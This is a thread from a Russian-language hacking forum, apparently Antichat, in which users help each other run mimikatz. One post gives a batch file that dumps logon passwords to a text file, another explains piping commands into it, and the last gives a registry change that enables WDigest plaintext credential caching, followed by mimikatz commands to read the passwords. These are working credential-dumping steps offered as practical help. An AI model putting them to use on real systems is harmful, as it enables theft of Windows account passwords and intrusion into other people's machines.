Antichat — официальный сайт

Статьи Ох уж этот mimikatz

Discussion in 'Статьи' started by SooLFaa, 3 Apr 2017.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Логи нужны, двух видов - что должно быть, и что есть. С конкретными командами.
     
    1. Veil

      Veil Banned

      Joined:
      21 May 2015
      Messages:
      2,020
      Likes Received:
      3,349
      Reputations:
      72
      Сейчас виртуалку включу и найду логи. Логи есть полные.
       
      SunnyS likes this.
      1. Alangile

        Alangile Banned

        Joined:
        28 Sep 2017
        Messages:
        105
        Likes Received:
        3
        Reputations:
        0
        с практикой у всех беда...
         
        1. moonden

          moonden Member

          Joined:
          3 Jul 2010
          Messages:
          45
          Likes Received:
          8
          Reputations:
          0
          Давно не пользовался, но днях понадобился. Никак не могу вывести результат в файл.
          Ранее делал так батником:
          Code:
          if exist %windir%\SysWOW64\taskmgr.exe (goto x64)
          start mimikatz privilege::debug
          mimikatz sekurlsa::logonPasswords full>p.txt
          :x64
          cd x64
          start mimikatz64 privilege::debug
          mimikatz64 sekurlsa::logonPasswords full>p.txt
          exit
          
          Знаю корявый код, но работало, сейчас никак не хочет, хотя в консоли все пароли кажет.
          Code:
          mimikatz privilege::debug
          mimikatz sekurlsa::logonPasswords
          Что с "full" что без него.
          Собссно требуется помощь по слогам, как бы это реализовать в батнике
           
          1. binarymaster

            binarymaster Elder - Старейшина

            Joined:
            11 Dec 2010
            Messages:
            4,717
            Likes Received:
            10,195
            Reputations:
            126
            Можно использовать stdin файл для ввода команд.
             
            1. moonden

              moonden Member

              Joined:
              3 Jul 2010
              Messages:
              45
              Likes Received:
              8
              Reputations:
              0
              Я в программировании не силен, можно на примере как это можно реализовать?
               
              1. binarymaster

                binarymaster Elder - Старейшина

                Joined:
                11 Dec 2010
                Messages:
                4,717
                Likes Received:
                10,195
                Reputations:
                126
                Причём тут программирование? Стандартные функции перенаправления ввода/вывода - пользуясь консолью это нужно знать.

                Code:
                echo line 1>file.txt
                echo line 2>>file.txt
                type file.txt|program.exe
                
                 
                moonden likes this.
                1. moonden

                  moonden Member

                  Joined:
                  3 Jul 2010
                  Messages:
                  45
                  Likes Received:
                  8
                  Reputations:
                  0
                  Сорян, просто не понял, что такое "stdin", начал гуглить он меня на С++ пинать начал. Спасибо за помощь.
                   
                  binarymaster likes this.
                  1. spainet

                    spainet New Member

                    Joined:
                    16 Feb 2016
                    Messages:
                    15
                    Likes Received:
                    0
                    Reputations:
                    0
                    согласен
                     
                    1. guest11

                      guest11 Member

                      Joined:
                      4 Dec 2018
                      Messages:
                      45
                      Likes Received:
                      7
                      Reputations:
                      0
                      Рабочий способ


                      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

                      gpupdate /force

                      Перезайти
                      privilege::debug
                      log c:\intel\log.txt
                      sekurlsa::wdigest

                      sekurlsa::logonpasswords не покажет пароль . нужно сначала sekurlsa::wdigest
                       
                      user100 likes this.